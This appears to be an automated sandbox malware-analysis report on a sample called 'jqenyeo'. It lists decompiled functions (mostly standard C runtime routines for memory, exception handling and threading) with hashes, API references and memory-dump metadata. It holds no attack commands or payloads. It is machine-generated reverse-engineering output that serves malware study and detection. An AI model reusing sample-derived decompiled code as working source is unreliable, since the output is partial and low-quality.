API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: e962d0ee91949d81dec31b13fab030e3cfb988c54088bcc417ff86c600293a5c
Instruction ID: 08638ded225e420fee8fbc02ae57d48bf2a2d170e3452f6154abbae9cebcad27
Opcode Fuzzy Hash: e962d0ee91949d81dec31b13fab030e3cfb988c54088bcc417ff86c600293a5c
Instruction Fuzzy Hash: 20017131C00208EADF12AFA69C4599F7AB1AF40364F14423BF8147A1F1D77D8A51DB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040142D Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E0040142D(intOrPtr _a4, intOrPtr _a8) {
				void* __ebp;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t6;
				void* _t7;
				void* _t10;

				_push(0x40);
				_push(_a8);
				_push(_a4);
				_t3 = E00401442(_t4, _t5, _t6, _t7, _t10); // executed
				return _t3;
			}

0x00401430
0x00401432
0x00401435
0x00401438
0x00401441

APIs

__wfsopen.LIBCMT ref: 00401438

Memory Dump Source

Source File: 00000001.00000002.289964197.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.289936903.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.289995064.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.290006359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_jqenyeo.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: f6e2920786bbec203282cdfb6f3b3633442830df4e5952b23224e3e68bcd5e43
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: B5B0927244020C77CE012E82EC02E593B199B507A8F008021FB0C281B1E6BBE660968A

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040410F Relevance: 3.0, APIs: 2, Instructions: 8
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0040410F(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				return UnhandledExceptionFilter(_a4);
			}

0x00404114
0x00404124

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,0040178F,?,?,?,00000000), ref: 00404114
UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 0040411D

Memory Dump Source

Source File: 00000001.00000002.289964197.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.289936903.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.289995064.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.290006359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_jqenyeo.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: dcb4722f0a632642793ad9d39d4fc1cf06e90c55a74e0595ad635aa03cc3fe3f
Instruction ID: 067b22139976b5875a2864e037a45bb3fb438998543bb6df764df44ff1f2647d
Opcode Fuzzy Hash: dcb4722f0a632642793ad9d39d4fc1cf06e90c55a74e0595ad635aa03cc3fe3f
Instruction Fuzzy Hash: B9B09231044218ABDA402B92EE09B883F2EFB04662F004420F60D540B19BB255608AAB

Uniqueness

Uniqueness Score: -1.00%

Function 004040DE Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004040DE(_Unknown_base(*)()* _a4) {

				return SetUnhandledExceptionFilter(_a4);
			}

0x004040eb

APIs

SetUnhandledExceptionFilter.KERNEL32(?,?,00402C7D,00402C32), ref: 004040E4

Memory Dump Source

Source File: 00000001.00000002.289964197.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.289936903.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.289995064.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.290006359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_jqenyeo.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 36f934ef4b296aaa1d3dbf936b85faf584bf2989de826da29e1899fba37ab72f
Instruction ID: 38e814d130715ca93d8304d701d29e9a64e1d58cdd9c4f0632652ad50e209764
Opcode Fuzzy Hash: 36f934ef4b296aaa1d3dbf936b85faf584bf2989de826da29e1899fba37ab72f
Instruction Fuzzy Hash: B4A0113000020CABCA002B82EE088883F2EEA002A0B000020FA0C00022ABB2AA208A8A

Uniqueness

Uniqueness Score: -1.00%

Function 009F061D Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.290403208.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_jqenyeo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 123e22cade36a5f7e84e6f32991f11fb2643e9023da6a48d7aaeea9cc29c5119
Instruction ID: c08a670591b423fb0668b83f77dad73436d9c64cdf53dfa847cc4f2c509bfd4b
Opcode Fuzzy Hash: 123e22cade36a5f7e84e6f32991f11fb2643e9023da6a48d7aaeea9cc29c5119
Instruction Fuzzy Hash: E5218E36A00218AFCB10DFA9C880ABDF7F9EFD8354B14856AE542D3362E674DE00DB50

Uniqueness

Uniqueness Score: -1.00%

Function 009F0736 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.290403208.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_jqenyeo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64c80a6db38535584993776924430328fc228a3310808f0bb0e95da0b1c4f32f
Instruction ID: 4effd3b9929ab6c9d5bbf5b386bcf97db34c8b71430626d3821080e6f3d07889
Opcode Fuzzy Hash: 64c80a6db38535584993776924430328fc228a3310808f0bb0e95da0b1c4f32f
Instruction Fuzzy Hash: 47E01A3576064A9FCB04DBB8C981D59B3E8EB88368B144294F916C73E2EA74FD00DB50

Uniqueness

Uniqueness Score: -1.00%

Function 009F0772 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.290403208.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_jqenyeo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 055fc2369cb3b2bc554ae43ce053feaa5be1087eab72588a8dd43b31cd325cde
Instruction ID: 9b060d8ac9de81677a5f582fc5932a61a97bf4598bbe49953539e67a5e8c3cd0
Opcode Fuzzy Hash: 055fc2369cb3b2bc554ae43ce053feaa5be1087eab72588a8dd43b31cd325cde
Instruction Fuzzy Hash: BDE086363105148BD720EA19C880967F3EDEBC83B071548A9EA4AD3712C230FC008B90

Uniqueness

Uniqueness Score: -1.00%

Function 009F06F7 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.290403208.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_jqenyeo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40

Uniqueness

Uniqueness Score: -1.00%

Function 00408702 Relevance: 19.6, APIs: 13, Instructions: 87
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00408702(intOrPtr _a4) {
				intOrPtr _t15;
				intOrPtr _t54;
				void* _t56;
				void* _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				void* _t61;
				void* _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t67;
				void* _t68;

				_t54 = _a4;
				if(_t54 != 0) {
					_t2 = _t54 + 0xc; // 0xf000000
					_t56 =  *_t2 -  *0x413e34; // 0x415054
					if(_t56 != 0) {
						E00404535(_t16);
					}
					_t3 = _t54 + 0x10; // 0x254804b7
					_t57 =  *_t3 -  *0x413e38; // 0x415054
					if(_t57 != 0) {
						E00404535(_t17);
					}
					_t4 = _t54 + 0x14; // 0x8000
					_t58 =  *_t4 -  *0x413e3c; // 0x415054
					if(_t58 != 0) {
						E00404535(_t18);
					}
					_t5 = _t54 + 0x18; // 0xfc7d80
					_t59 =  *_t5 -  *0x413e40; // 0x415054
					if(_t59 != 0) {
						E00404535(_t19);
					}
					_t6 = _t54 + 0x1c; // 0x4d8b0774
					_t60 =  *_t6 -  *0x413e44; // 0x415054
					if(_t60 != 0) {
						E00404535(_t20);
					}
					_t7 = _t54 + 0x20; // 0x706183f8
					_t61 =  *_t7 -  *0x413e48; // 0x415054
					if(_t61 != 0) {
						E00404535(_t21);
					}
					_t8 = _t54 + 0x24; // 0x5de58bfd
					_t62 =  *_t8 -  *0x413e4c; // 0x415054
					if(_t62 != 0) {
						E00404535(_t22);
					}
					_t9 = _t54 + 0x38; // 0x8b55c35d
					_t63 =  *_t9 -  *0x413e60; // 0x415058
					if(_t63 != 0) {
						E00404535(_t23);
					}
					_t10 = _t54 + 0x3c; // 0x10ec83ec
					_t64 =  *_t10 -  *0x413e64; // 0x415058
					if(_t64 != 0) {
						E00404535(_t24);
					}
					_t11 = _t54 + 0x40; // 0x758b5653
					_t65 =  *_t11 -  *0x413e68; // 0x415058
					if(_t65 != 0) {
						E00404535(_t25);
					}
					_t12 = _t54 + 0x44; // 0x74f6850c
					_t66 =  *_t12 -  *0x413e6c; // 0x415058
					if(_t66 != 0) {
						E00404535(_t26);
					}
					_t13 = _t54 + 0x48; // 0x105d8b18
					_t67 =  *_t13 -  *0x413e70; // 0x415058
					if(_t67 != 0) {
						E00404535(_t27);
					}
					_t14 = _t54 + 0x4c; // 0x1174db85
					_t15 =  *_t14;
					_t68 = _t15 -  *0x413e74; // 0x415058
					if(_t68 != 0) {
						return E00404535(_t15);
					}
				}
				return _t15;
			}

0x00408706
0x0040870b
0x00408711
0x00408714
0x0040871a
0x0040871d
0x00408722
0x00408723
0x00408726
0x0040872c
0x0040872f
0x00408734
0x00408735
0x00408738
0x0040873e
0x00408741
0x00408746
0x00408747
0x0040874a
0x00408750
0x00408753
0x00408758
0x00408759
0x0040875c
0x00408762
0x00408765
0x0040876a
0x0040876b
0x0040876e
0x00408774
0x00408777
0x0040877c
0x0040877d
0x00408780
0x00408786
0x00408789
0x0040878e
0x0040878f
0x00408792
0x00408798
0x0040879b
0x004087a0
0x004087a1
0x004087a4
0x004087aa
0x004087ad
0x004087b2
0x004087b3
0x004087b6
0x004087bc
0x004087bf
0x004087c4
0x004087c5
0x004087c8
0x004087ce
0x004087d1
0x004087d6
0x004087d7
0x004087da
0x004087e0
0x004087e3
0x004087e8
0x004087e9
0x004087e9
0x004087ec
0x004087f2
0x00000000
0x004087fa
0x004087f2
0x004087fd

APIs

_free.LIBCMT ref: 0040871D

Part of subcall function 00404535: HeapFree.KERNEL32(00000000,00000000,?,00402F89,00000000,00401466,00411E80,0000000C,0040143D,?,?,00000040,?,00401026,?,00413000), ref: 00404549
Part of subcall function 00404535: GetLastError.KERNEL32(00000000,?,00402F89,00000000,00401466,00411E80,0000000C,0040143D,?,?,00000040,?,00401026,?,00413000), ref: 0040455B

_free.LIBCMT ref: 0040872F
_free.LIBCMT ref: 00408741
_free.LIBCMT ref: 00408753
_free.LIBCMT ref: 00408765
_free.LIBCMT ref: 00408777
_free.LIBCMT ref: 00408789
_free.LIBCMT ref: 0040879B
_free.LIBCMT ref: 004087AD
_free.LIBCMT ref: 004087BF
_free.LIBCMT ref: 004087D1
_free.LIBCMT ref: 004087E3
_free.LIBCMT ref: 004087F5

Memory Dump Source

Source File: 00000001.00000002.289964197.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.289936903.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.289995064.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.290006359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_jqenyeo.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: c6c0e77dc8294a2ea5e944199d3f13d286ad74d2b3f09fe072b3a39078fcd2db
Instruction ID: f04fc6fc6f9de8751afe861eb1d73b392140216a2a145ff1f7222b8b789f6bc8
Opcode Fuzzy Hash: c6c0e77dc8294a2ea5e944199d3f13d286ad74d2b3f09fe072b3a39078fcd2db
Instruction Fuzzy Hash: 7B212FB2504304BBC624EF29FDC1C5673F9AA443127A4482EF285F76D5DA78FD808A2C

Uniqueness

Uniqueness Score: -1.00%

Function 0040304B Relevance: 10.5, APIs: 7, Instructions: 45
threadCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040304B(void* __ebx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t27;

				E004031FA(_t3);
				if(E004044E7() != 0) {
					_t6 = E00403D67(E00402DDC);
					 *0x413508 = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t27 = E0040456D(1, 0x3bc);
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E004030C1();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E00403DC3( *0x413508, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E00402F98(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E004030C1();
					return 0;
				}
			}

0x0040304b
0x00403057
0x00403066
0x0040306b
0x00403071
0x00403074
0x00000000
0x00403076
0x00403083
0x00403087
0x00403089
0x004030b8
0x004030b8
0x004030bd
0x004030c0
0x0040308b
0x00403099
0x0040309b
0x00000000
0x0040309d
0x0040309d
0x0040309f
0x004030a0
0x004030a7
0x004030ad
0x004030b1
0x004030b5
0x004030b7
0x004030b7
0x0040309b
0x00403089
0x00403059
0x00403059
0x00403059
0x00403060
0x00403060

APIs

__init_pointers.LIBCMT ref: 0040304B

Part of subcall function 004031FA: RtlEncodePointer.NTDLL(00000000,?,00403050,0040157E,00411EA0,00000014), ref: 004031FD
Part of subcall function 004031FA: __initp_misc_winsig.LIBCMT ref: 00403218
Part of subcall function 004031FA: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00403E5A
Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00403E6E
Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00403E81
Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00403E94
Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00403EA7
Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00403EBA
Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00403ECD
Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00403EE0
Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00403EF3
Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00403F06
Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00403F19
Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00403F2C
Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00403F3F
Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00403F52
Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00403F65
Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00403F78

__mtinitlocks.LIBCMT ref: 00403050
__mtterm.LIBCMT ref: 00403059

Part of subcall function 004030C1: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,0040305E,0040157E,00411EA0,00000014), ref: 00404401
Part of subcall function 004030C1: _free.LIBCMT ref: 00404408
Part of subcall function 004030C1: DeleteCriticalSection.KERNEL32(pKA,?,?,0040305E,0040157E,00411EA0,00000014), ref: 0040442A

__calloc_crt.LIBCMT ref: 0040307E
__initptd.LIBCMT ref: 004030A0
GetCurrentThreadId.KERNEL32 ref: 004030A7

Memory Dump Source

Source File: 00000001.00000002.289964197.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.289936903.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.289995064.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.290006359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_jqenyeo.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: e33af350f6e9ef2e6780073be376e251c14a03b5d83e9ec52140cb940fccbdab
Instruction ID: 2115b65a6a9c202ad142230a1a1e4feb1784a8349ca752f000b05186f7d9f433
Opcode Fuzzy Hash: e33af350f6e9ef2e6780073be376e251c14a03b5d83e9ec52140cb940fccbdab
Instruction Fuzzy Hash: 49F06D3216A6112DE6387F766C07A4B2E9C8F01B7AF20463FF560B51D6EE398A81419C

Uniqueness

Uniqueness Score: -1.00%

Function 0040916C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 97
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0040916C(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				signed int _v20;
				signed int _t35;
				int _t38;
				signed int _t41;
				int _t42;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				signed int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E00405DA9( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E00409121( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t41 = _v20;
							_t59 = 1;
							_t28 = _t41 + 4; // 0x840ffff8
							_t42 = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t42;
							if(_t42 != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E004024C9();
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							_t20 = _t59 + 0x74; // 0xe1c11fe1
							__eflags = _t50 -  *_t20;
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(_t62[1] == 0) {
								goto L20;
							}
							L18:
							_t22 = _t59 + 0x74; // 0xe1c11fe1
							_t59 =  *_t22;
							goto L21;
						}
						_t12 = _t59 + 0x74; // 0xe1c11fe1
						__eflags = _t50 -  *_t12;
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t17 = _t59 + 0x74; // 0xe1c11fe1
						_t18 = _t59 + 4; // 0x840ffff8
						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}

0x00409174
0x00409179
0x00409193
0x00000000
0x00409193
0x0040917b
0x00409180
0x00000000
0x00000000
0x00409185
0x004091a2
0x004091a7
0x004091aa
0x004091b1
0x004091d0
0x004091d7
0x004091d9
0x0040921d
0x00409229
0x0040922c
0x00409231
0x00409234
0x0040923a
0x0040923c
0x0040924c
0x0040924c
0x00409250
0x00409252
0x00409255
0x00409255
0x00409255
0x00409255
0x00000000
0x0040925b
0x0040923e
0x0040923e
0x00409243
0x00409243
0x00409246
0x00000000
0x00409246
0x004091db
0x004091de
0x004091e2
0x0040920b
0x0040920b
0x0040920b
0x0040920e
0x0040920e
0x00000000
0x00000000
0x00409210
0x00409214
0x00000000
0x00000000
0x00409216
0x00409216
0x00409216
0x00000000
0x00409216
0x004091e4
0x004091e4
0x004091e7
0x00000000
0x00000000
0x004091eb
0x004091f5
0x004091fb
0x004091fe
0x00409204
0x00409207
0x00409209
0x00000000
0x00000000
0x00000000
0x00409209
0x004091b3
0x004091b6
0x004091b8
0x004091bd
0x004091bd
0x004091c2
0x00000000
0x004091c2
0x00409187
0x0040918c
0x00409190
0x00409190
0x00000000

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004091A2
__isleadbyte_l.LIBCMT ref: 004091D0
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000), ref: 004091FE
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000), ref: 00409234

Strings

.\@, xrefs: 0040916C

Memory Dump Source

Source File: 00000001.00000002.289964197.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.289936903.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.289995064.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.290006359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_jqenyeo.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID: .\@
API String ID: 3058430110-2906710320
Opcode ID: a3a2b69d6d2b9a4b6c28d472179e9680dc856bfc5fdc6e53166ac95398402672
Instruction ID: de8054beb32b7dc64be8669cb2ea50c94ab5c5166fc26728190ff957983d3686
Opcode Fuzzy Hash: a3a2b69d6d2b9a4b6c28d472179e9680dc856bfc5fdc6e53166ac95398402672
Instruction Fuzzy Hash: 0A31A130604206BFEB218E65CC48BAB7BA5FF41310F15487EE864AB2D2D738DC51DB99

Uniqueness

Uniqueness Score: -1.00%

Function 00408075 Relevance: 7.6, APIs: 5, Instructions: 67
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E00408075(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				void* _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				void* _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					if(_t31 != 0) {
						_push(__ebx);
						while(_t31 <= 0xffffffe0) {
							if(_t31 == 0) {
								_t31 = _t31 + 1;
							}
							_t7 = HeapReAlloc( *0x414224, 0, _a4, _t31);
							_t20 = _t7;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								if( *0x415060 == _t7) {
									_t9 = E004024C9();
									 *_t9 = E004024DC(GetLastError());
									goto L17;
								} else {
									if(E00406D05(_t7, _t31) == 0) {
										_t12 = E004024C9();
										 *_t12 = E004024DC(GetLastError());
										L12:
										_t8 = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E00406D05(_t6, _t31);
						 *((intOrPtr*)(E004024C9())) = 0xc;
						goto L12;
					} else {
						E00404535(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E00407FE3(__ebx, __edx, __edi, _a8);
				}
			}

0x0040807c
0x0040808a
0x0040808f
0x0040809e
0x004080d1
0x004080a3
0x004080a5
0x004080a5
0x004080b2
0x004080b8
0x004080bc
0x0040811c
0x0040811c
0x004080be
0x004080c4
0x00408106
0x0040811a
0x00000000
0x004080c6
0x004080cf
0x004080ee
0x00408102
0x004080e8
0x004080e8
0x00000000
0x00000000
0x00000000
0x004080cf
0x004080c4
0x00000000
0x004080ea
0x004080d7
0x004080e2
0x00000000
0x00408091
0x00408094
0x0040809a
0x0040809a
0x004080eb
0x004080ed
0x0040807e
0x00408088
0x00408088

APIs

_malloc.LIBCMT ref: 00408081

Part of subcall function 00407FE3: __FF_MSGBANNER.LIBCMT ref: 00407FFA
Part of subcall function 00407FE3: __NMSG_WRITE.LIBCMT ref: 00408001
Part of subcall function 00407FE3: RtlAllocateHeap.NTDLL(00480000,00000000,00000001,00000000,00000000,00000000,?,004045CB,00000000,00000000,00000000,00000000,?,00404480,00000018,00411FD8), ref: 00408026

_free.LIBCMT ref: 00408094

Memory Dump Source

Source File: 00000001.00000002.289964197.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.289936903.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.289995064.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.290006359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_jqenyeo.jbxd

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: 203b7c5fc3a61a23da61efa24fa73c8b6d154fd32cc8f013885648f5e2350aaa
Instruction ID: 9f8fe8c4bbd9e52b1c20aa057dcece5d638b265e9f3ef175acddb1746402e183
Opcode Fuzzy Hash: 203b7c5fc3a61a23da61efa24fa73c8b6d154fd32cc8f013885648f5e2350aaa
Instruction Fuzzy Hash: 2E110A32504215ABCB202F76FE0966B37A46F44364F11893FF989BA2D0DF7C8885C69C

Uniqueness

Uniqueness Score: -1.00%

Function 004030DE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 16%

			E004030DE(void* __ecx, intOrPtr _a4) {
				struct HINSTANCE__* _v8;
				_Unknown_base(*)()* _t4;

				_t4 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t4, __ecx);
				if(_t4 != 0) {
					_t4 = GetProcAddress(_v8, "CorExitProcess");
					if(_t4 != 0) {
						return  *_t4(_a4);
					}
				}
				return _t4;
			}

0x004030e2
0x004030ed
0x004030f5
0x004030ff
0x00403107
0x00000000
0x0040310c
0x00403107
0x00403111

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,0040311D,00000000,?,00408010,000000FF,0000001E,00000000,00000000,00000000,?,004045CB), ref: 004030ED
GetProcAddress.KERNEL32(?,CorExitProcess), ref: 004030FF

Strings

CorExitProcess, xrefs: 004030F7
mscoree.dll, xrefs: 004030E6

Memory Dump Source

Source File: 00000001.00000002.289964197.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.289936903.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.289995064.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.290006359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_jqenyeo.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 1646373207-1276376045
Opcode ID: e41157a03b6b2c61028faa385d86cc0ba5d050f528bde22708dc0c239dc5d6e7
